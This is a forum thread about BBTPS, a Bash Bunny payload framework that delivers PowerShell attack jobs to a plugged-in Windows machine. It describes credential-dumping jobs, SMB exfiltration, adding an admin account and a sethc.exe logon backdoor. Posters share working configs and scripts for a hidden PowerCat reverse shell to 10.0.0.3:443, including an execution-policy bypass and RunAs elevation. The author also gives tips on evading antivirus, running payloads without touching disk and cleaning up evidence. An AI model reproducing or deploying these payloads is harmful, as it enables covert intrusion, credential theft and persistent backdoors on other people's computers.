BBTPS Release (1.6)[Repo Version]

[PoSHMagiC0de]

Okay all, I finally finished this thing well enough for me to release but more work yet to be done.  It works.  Try it out and let me know what you think.  I got tired of fiddling with it and just decided to get something out there.

https://github.com/PoSHMagiC0de/BBTPS

Oh, my first time actually using github too.  I usually have friends in town who does pushed on my behalf..cause I am lazy.  I decided to learn git and do it myself.

[PoSHMagiC0de]

Update...

Just updated the BunnyAgent.  It is Powershell 2.0 compliant now.  I went through the code and found the issue.  I had 2 condition statments using the "-in" condition to see if an item was in an array.  "-in" does not exist in 2.0.  Switch around the condition statement to use "-contains".  Works fine in 2.0 now.  Enjoy.

 

[PoSHMagiC0de]

I just have some documentation tweaks and a few code tweaks here and there I see to do.  Other than that, any further development of this project depends on what the community sees this tool mostly as.  Is it good as a payload to be in the switch directories or do you rather see it as a tool.

If you see it as a tool, I will begin to work on it being used as a tool to be installed and function properly versus being served in the payload switch directory.

[PoSHMagiC0de]

Okay, BBTPS went through an big update and is now 1.0.

Changes:

No longer have to encode or compress scripts.  The node server uses zlib to compress and then base64 encodes your script for transport before sending.

No more encodings option in joblist.json.  It just takes plain text scripts.  Encoding was replaced by runType.  The run type will launch your script as a job "thread" so it can get back data from it.  You jobs can also be launched as a separate process, "process".  Process is for stuff that will keep running long after the bunny is done.  It base64 encodes your script and uses start-process to fire it off hidden.

Refactored some functions and stuff and redid the payload launcher.  Yeah, it is longer than before.  I wanted the cradle to keep trying 20 times to get payload (once every 2 seconds) and if nothing then exit.  That way if the agent never gets pulled from the bunny then the cradle doesn't sit there in the background forever.

I also fixed the npm install for it.  I had the version incorrectly added to the package.json.  It will install dependencies now.

Future Additions:

I plan on adding in the ability for the server to deliver Python agents and handle their jobs for OSX and *nix systems.

Plan on building a webserver to configure and add payloads to BBTPS and incorporating BBTPS as a full Bunny payload solution.

 

For the Python agent, I will have to research handling threaded jobs before I can build an agent in it but will work similarly as the powershell bbagent.

[PoSHMagiC0de]

So, I have a version 1.6 of the BBTPS done.  It even has a sample job pack.  Issue is I am having writers block with the documentation.  So, it may be pushed out tomorrow but the readme will suck until I get the wiki done.  Yeah, my over zealous sourcing out of the payload.txt into additional modules and additions to the agent with a new internal function scripts have access to to queue up new jobs on the BB and variables containing smb paths to the BB have made me have to do a wiki on how to use with your own scripts.  The readme will have instructions on how to use the sample pack which has a powershellized version of smb exfiltrator I put together, creates an admin account, runs mimidogz from iwill's Mr. Robot payload, Invoke-Powerdump from Powershell empire, and do a procedure would have thought would have showed up here I call the sethc.exe/cmd.exe swap backdoor.  Last I have secabstractions version of Powercat with all module dependencies added into 1 script to invoke a reverse netcat shell to whatever location you have a netcat listener at.  they can be ran in 3 different ways and are ran Asynchronously.  This should keep you busy until I can get some sort of wiki done.  Of course my wifi pineapple nano tactical comes in this week so delays may ensue on the wiki. :-|

[PoSHMagiC0de]

BBTPS 1.6 has been released.  I got sidetracked in releasing it earlier with work stuff popping up and my getting my Nano.  This new version modularlizes the payload.txt breaking it into different sourced files.  The readme.md is enough to get started.  Enjoy, not for the faint of heart.

https://github.com/PoSHMagiC0de/BBTPS

 

[korang]

Could you create a demo video of this in use?

[PoSHMagiC0de]

On 6/19/2017 at 4:52 AM, korang said:

Could you create a demo video of this in use?

I'm camera shy. :-P

I actually have zero skills at doing video stuff.  Never was my bag.  If I did, it would probably end up being 2-3 clips.  One made on my linux box about how to npm the packages and then add it to the bunny and how all the parts work using the VSCode editor.  Yeah, I used VSCode, I even included a VSCode launch.json for testing locally without the bunny.  After the linux stuff a demo would have to be shown on the Windows victim...and people would probably want to see the bunny lights and explanation of them.  Lots of video splicing.  Only thing I spliced is wires hehe.  Not even remotely as skilled as Darren K who can spin out a multicultural hack across the plan video in a week with all the frills.  :-)

 

I am working on a wiki for it though, with screenshots.

Edited June 21, 2017 by PoSHMagiC0de

[ccollins]

This is a great idea to combine multiple payloads into one. I'm really interested in getting PowerCat working and I've seen how you're using it in joblist3.json. It's almost working for me, but the PowerCat connection disconnects immediately after being connected. I'm wondering if the process is killed after all the jobs finish running instead of keeping powercat alive in the background. Also for anyone else wanting to learn PowerCat I think it's worth adding to your documentation how to set up the listener. Let me try to help add to some of your documentation. 

For now I've created my own joblist4.json like this,

[{
    "jobName"   :"PowerCat",
    "command"   :"Connect-Powercat -Mode TCP -RemoteIP \"10.0.0.3\" -Port 443 -Execute -KeepAlive",
    "runType"   :"process",
    "scriptName":"Connect-PowerCat2.ps1"
}]

Note: For everyone following along the RemoteIp is the PowerCat listener which is waiting for a SHELL connection to be established. Essentially you get a remote powershell. A shell is just one of the many functions of PowerCat, apparently you can transfer files as well. See documentation here https://github.com/secabstraction/PowerCat

For documentation purposes I'll show the other files I configured. Here's the jobselectect.txt

#!/bin/bash

# Job config selector file.  Use this file to export the base config for your
# batch job.  Config file template is located in templates/payload_config_template.txt
# Example configs are included in the configs folder of this project.

# Default test config payload
#source $PAYLOADFOLDER/configs/bbtpsdefault.txt

# TotalP0wn Payload config
source $PAYLOADFOLDER/configs/totalp_config.txt

Here's the totalp_config.txt

#!/bin/bash

#Default configuration file for BBTPS.
#You can use this file as a template, do not leave any settings out or
#You will get errors.

# Bunny root loot folder name.
export ROOTFOLDERNAME="bbtps"

# Folder where scripts live.
export JOBFOLDER="$PAYLOADFOLDER/jobs/totalp0wn"
#########################################################################
# BELOW UNCOMMENT ONE OF THE JOBLIST YOU WANT TO RUN FROM THE TOTAL P0WN GROUP. DESCRIPTIONS ARE LISTED ABOVE EACH.
# Job runlist json file.

# Joblist1 runs Get-VaultCredentials, Invoke-Mimidogz, Invoke-PowerDump and Invoke-AddAdminUser.
# If not ran as admin then only VaultCredentials will return anything if anything present.
#export JOBLIST="$JOBFOLDER/joblist1.json"

# Joblist2 will always Get-VaultCredentials and Invoke-SMBExfil.  It will run Invoke-AdminJobs to check for admin and if
# it is running as UACbypassed Admin it will call back to the server to queue up to be delivered and ran: Mimidogz, PowerDump,
# and AddAdminUser.
#export JOBLIST="$JOBFOLDER/joblist2.json"

# Joblist3 is the signature Total P0wn job load.  When ran as non-admin the following scripts will run:
# VaultCredentials, Powercat (Powershell Netcat, requires another machine running Powercat or NCat), SMBExfil.
# If ran as admin then the AddAdminJobsTP will test true to UACBypassed admin and queue up the following jobs:
# Mimidogz, PowerDump, AddAdminUser and SethcBD (Sets a local backdoor for even locked machines when you hit SHIFT
# 5 times will get a UACBypassed System level cmd prompt from logon screen and even lock screen.)
#export JOBLIST="$JOBFOLDER/joblist3.json"

# Joblist4 is my own custom job.
export JOBLIST="$JOBFOLDER/joblist4.json"

#########################################################################
# Do you want the stager to run as admin, 1 for yes, 0 for no.
export GETADMIN=1

# ATTACKMODE TYPES
# 0 = SINGLE/ 1 = DUAL
export ATMODE=1

# Enable/Disable debug.  1 for on, 0 for off.
export DEBUG=1

# First Quack Delay, after running initial command from run prompt.
export Q_DELAY1=3000

# Second Quack Delay, if getting admin then this is ran after selecting Yes.
export Q_DELAY2=3000

Note: I changed to my custom joblist4.json, ATMODE=1, DEBUG=1, and the delays to 3 seconds from the original. 

That's basically it for the BB. Now for the listener, I had to download the PowerCat source files from https://github.com/secabstraction/PowerCat and I placed them on my windows machine at $env:userprofile\Documents\WindowsPowerShell\Modules\PowerCat

I discovered that powershell likes to store modules in this folder $env:userprofile\Documents\WindowsPowerShell\Modules. Also you can run this command in powershell,

echo $Env:PSModulePath

to see where modules go in powershell. Just make sure the PowerCat.psd1 is directly under the path: $env:userprofile\Documents\WindowsPowerShell\Modules\PowerCat\PowerCat.psd1

Then I had to change my execution policy in order to Import the PowerCat module. So in powershell change the Execution Policy with this command,

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

Press "Y" and [Enter] when prompted. Now import the powercat module with this command, 

Import-Module PowerCat

Note: If this fails you can also import the PowerCat.psd1 file directly by navigation to it and Import-Module PowerCat.psd1. It's just nicer to have powercat in a working modules folder so it can be imported anytime. 

Now finally to set up the listener to wait for our target machine, I issued the powershell command, 

Start-PowerCat -Mode TCP -Port 443 -KeepAlive

Note: The port 443 matches the port used in joblist4.json. It can be any open port they just have to match. The KeepAlive parameter is supposed to re-connected WHEN (not if) the connection is lost. Which times out after 60 seconds by default anyways. 

So my problem is the BBTPS doesn't stay connected on the target machine. Sorry I know this is a lot to process but basically this is is the goal,

Basic Shell Connection
=-=-=-=-=-=-=-=-=-=-=-=-=
Set Up Listener
> Start-PowerCat -Port 443 -KeepAlive

Send PowerShell on Target Machine --> Listener Machine
> Connect-PowerCat -RemoteIp <ListenerPC Ip> -Port 443 -Execute

I set up a reverse shell and it works great when I tested the commands manually. So as far as BBTPS I guess my next attempt is to try and copy the PowerCat shell script over to the target machine and just trigger it to run before disconnecting the BashBunny. Similar to how the USB_Intruder Payload works by copying scripts from the BB --> %WinDir%\ProgData\ and then the BashBunny triggers the script to run by, 

# PayLoad on BB
Q STRING powershell -WindowStyle Hidden \$Env:WinDir\ProgData\shell.bat
Q ENTER

before the BB payload is completed. I would change the shell.bat to look like this,

# File: $Env:WinDir\ProgData\shell.bat
@echo off
call %windir%\ProgData\revshell-PowerCat2.bat

and the revshell-PowerCat2.bat would look like this,

# File: $Env:WinDir/ProgData/revshell-PowerCat2.bat
@ECHO OFF
PowerShell.exe -Command "& {Start-Process PowerShell.exe -ArgumentList '-ExecutionPolicy Bypass -File ""%~dpn0.ps1""' -Verb RunAs}"

BOOM! Now we have a hidden powershell process running in the background. For anyone that didn't know how to do that. The string -File ""%~dpn0.ps1""' would translate into -File ""revshell-PowerCat2.ps1""' which comes from the file name of the .bat file called in the shell.bat. Then finally the trick would be writing the revshell-PowerCat2.ps1 file. We still have to import the PowerCat module and issue the "Connect-Powercat" command. So I would try something like this,

# File: $Env:WinDir/ProgData/revshell-PowerCat2.ps1
Start-Process -WindowStyle hidden -FilePath "$Env:WinDir\ProgData\Connect-Powercat2.ps1" -ArgumentList "Connect-Powercat -Mode TCP -RemoteIP \"10.0.0.3\" -Port 443 -Execute -KeepAlive"

....maybe. I don't know if this will work. I'll give it a try and update this thread on my results. 

[ccollins]

UPDATE: I can NOT use -KeepAlive on the target machine. I changed my joblist4.json to,

[{
    "jobName"   :"PowerCat",
    "command"   :"Connect-Powercat -Mode TCP -RemoteIP \"10.0.0.3\" -Port 443 -Execute",
    "runType"   :"process",
    "scriptName":"Connect-PowerCat2.ps1"
}]

and now it works fine. The last part of my last post would probably make sense for the USB_Intruder Payload. I was on the right track with everything except for the last file "revshell-PowerCat2.ps1" was way off. I got it working with this,

# File: $Env:WinDir/ProgData/revshell-PowerCat2.ps1

PowerShell.exe -WindowStyle hidden {
	if(!(Test-Path $Env:ProgramFiles\WindowsPowerShell\Modules\PowerCat\PowerCat.psd1)){
		mkdir -p $Env:ProgramFiles\WindowsPowerShell\Modules\PowerCat
		xcopy /C /Q /G /Y /S $Env:WinDir\ProgData\PowerCat\*.* $Env:ProgramFiles\WindowsPowerShell\Modules\PowerCat\ 
	}

	Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -force
	Import-Module PowerCat
	Connect-Powercat -Mode TCP -RemoteIP 10.0.0.3 -Port 443 -Execute

}

Note: The PowerCat module has to be loaded and I just use a condition to see if the module exists. If not I created it by copying the files from $Env:WinDir\ProgData\PowerCat\*.* --> $Env:ProgramFiles\WindowsPowerShell\Modules\PowerCat with the assumption that the files in ProgData\PowerCat are the same files from https://github.com/secabstraction/PowerCat

So to clean this up I'll try to post an update on the USB_Intruder PayLoad when I get a chance. If you're familiar with USB_Intruder all I would be adding is these files: shell.bat, revshell-PowerCat2.bat, revshell-PowerCat2.ps1, and a download of PowerCat from https://github.com/secabstraction/PowerCat

 

 

[PoSHMagiC0de]

Weird.  I combined all the modules for the original Powercat to one so it can run directly from download and the BBTPS should be firing it off as a separate process so the BB ending should not affect it.  Pretty much followed what the command that deploys netcat as a payload to build it.  I will have to test it again to see this but it should be loaded the minute you run it in memory.  Yeah, I like Powercat.  I use it on Windows machines sometimes to scan for ports and stuff when I do not want to run netcat on windows.  Plus sometimes the Self contained deployment of netcat is detected as malicious by some virus scanners.

[PoSHMagiC0de]

I am thinking @ccolins should do the video for the BBTPS.  From what I read above he has it down pack.

[ccollins]

On 7/23/2017 at 4:04 PM, PoSHMagiC0de said:

I am thinking @ccolins should do the video for the BBTPS.  From what I read above he has it down pack.

I can probably do a basic demo. I don't fully understand everything you've done but I know enough to make it work.

[PoSHMagiC0de]

I did more testing with the powercat script in the totalp0wn payload of the bbtps.  On Windows 7 machines it works as intended.  On a Windows 10 machine it exhibits the behavior you describe with the session opening and then closing by remote host.  Hmmm.  When I copy the script to the desktop of the windows 10 machine, load it into a variable as a string and invoke it and then run the function it works.  I even tried to do the -NoE option but it fails on the bbtps.  May have to modify the agent to not hide the process window so I can see what happens.

Yeah, the Connect-Powercat2.ps1 script file is that same module on github but I unfactored it so it can be one file and be load and fired off as a payload without touching disk.

I planned on doing some docs on the modules in the totalp0wn job list but originally built that joblist as an example of what I would use as a combo payload in the BBTPS.  Didn't think it would be popular.  

[Dviros]

Dear @PoSHMagiC0de,

Thanks a lot for your payload!
I want to add my own scripts, that may need to include "import-module" type of code (for example, https://github.com/CyberArkLabs/ACLight).

1. How to I do it?

2. Is it possible to run EXE files as well?

 

Thanks again

Dvir

[PoSHMagiC0de]

21 hours ago, Dviros said:

Dear @PoSHMagiC0de,

Thanks a lot for your payload!
I want to add my own scripts, that may need to include "import-module" type of code (for example, https://github.com/CyberArkLabs/ACLight).

1. How to I do it?

2. Is it possible to run EXE files as well?

 

Thanks again

Dvir

I glanced through that module.  It looks like all you need is the ps1 file.  Module file just imports all the ps1 files in that folder and I only see 1 so the ACLight.ps1 is the actual file that runs.

Issue with it (and understandable why it does it is to conserve memory) is that it creates work files on the drive and ends it with a csv file with your stuff you actually want..unless all those files are what you want.  In that case, you can leave the script as is but write a counter script to pickup those files it creates and move them to the BB via SMB or if it is one then you may can read it in as a string and spit it to the output and the BBTPS will take care of delivering back to the job file.

You will need to create a config file in the config folder named something to identify the payloads that will be running.  Look at the samples to see how they are configured.

You will need to create a folder in the jobs folder named after the folder name you put in your config folder.

Inside that folder put the script.

Inside same folder make a jobs.json file or whatever name you gave it in the config file but it has to be in json format.  Look at samples to see format.

Last thing you need to do is edit the jobselect.txt file in the root to point to the config file for your payload.

Order of running is the payload.txt called jobselect.txt which calls your config that initializes all required environment variables for your jobs.  After that it returns to payload.txt to invoke on your config like creating folders, activating attackmodes and running ducky commands to get the agent on the victim when the node server initializes and deliver the jobs listed in the jobs.json file.  Data returned on output is sent back to the node server where it is placed in the txt file under your loot folder for that machine under the job name.txt.  Other means is to deliver and receive files via SMB.

This leads to 2.  Yes it can run exes but depends on how you want to run them.  Standard way is to have it on the SMB server of the BBTPS and have your script copy it to the machine and run it.  If you want it to run separate from the agent you can have a script to copy the exe to the victim and the tell the BBTPS to deliver another script to the agent to be executed as a process to run that file.  Last way is if you are really good you could inject it or reflective invoke it depending on how it was compiled.  That is an advanced topic too big to discuss here.

 

So, summary.  You can use that script but you will need to do manual collection of the results since it drops it to a file unless you change the script to do otherwise.  You also will need to do cleanup of anything you don't collect since it will leave evidence.  And it can run exes though if it is an exe designed to stay I would run it as a process so it is not inside the BBTPS agent and keep it from ending letting you know it is safe to pull the Bunny.

[PoSHMagiC0de]

Speaking of the BBTPS.  I got an idea from another project I use on my Pi Zero W.  The agent for the BBTPS may become a .NET dll coded in C# that will be loaded reflectively.  I hear it reduces the footprint and increases performance, not like it needs a performance boost but it is something to try.

[Dviros]

@PoSHMagiC0de Thanks for the comprehensive explanation.

For the copying of the CSV file, I will just modify your SMB script to collect it.

For the execution of the script, I've tried at first to import the module and then to execute it in the same command (import-module ACLight.psm1; start-aclight), however, due to the relative location of the scripts, it can't be found.

So I've contacted the developer and asked him for a single PS1 script. This may be the answer.

As for the EXE, that's an agreeable approach - copy to %temp%, unzip (found it better in terms of integrity keeping) the EXE and execute it.

 

Thanks man. I'll be happy to assist with the .NET dll.

 

[PoSHMagiC0de]

NP man.  I think the ps1 file as it is will do.  That is the script.  Just load that and run your commands if it doesn't autorun.  You could encapsulate it all in a function called "Invoke-ACLight'.  That way in the joblist.json on the command part you can put invoke-aclight as the command to invoke it.  Of course with the rest of the function you can add in the collection part.  The BBTPS does deliver the path to the SMB path as a variable you can use to assist.  They are named $BB_SMBROOT for the path to the root of the bbtps folder in the loot folder on the bash bunny and $BB_SMBLOOT for the folder with the name of the machine inside the bbtps loot folder.  Just use them with a join-path and your filename and it will be there.

copy-item -path (join-path $BB_SMBROOT "myexe.exe") -destination "c:\localfolder"

and

copy-item -path $exfiltrationpath -destination $BB_SMBLOOT

 

[PoSHMagiC0de]

So, I guess I will be making a minor update but will appear in a different branch.

This new version will simplify installation.  In otherwords I am removing express module from the project and going with the vanilla http module.  Reason for his is some may not be able to install the express dependency that is needed to run the BBTPS.  Also, the current format is not conducive to be merged into the Hak5 Bashbunny repo due to the dependency needing to be installed.

This update is still 1.6 since the usage will be the exact same.  This will be just the version I will be submitting to the Hak5 Bb repo.  I will be keeping and updating this one along side the original.  I plan on submitting it under the general section since it is mainly a tool for people to add their own payloads to use.  The payloads that come with it are for examples though some like to use it as is just changing which payloads are ran.

[PoSHMagiC0de]

So, finally finished the No_Express version of the BBTPS.  This means no npm install before adding to your BashBunny.  Just can add it and begin using it.

I also post a pull request to have it included in the Hak5 payloads under the general since it is mainly a tool/utility.  Later I will work on refactoring it into submodules since the payserver code has increased with absence of Express but overall project is smaller without Express' overhead.

The update is on the No_Express branch of the BBTPS.  When I clean it up I will merge it with master and do a pull request to update the Hak5 repo again.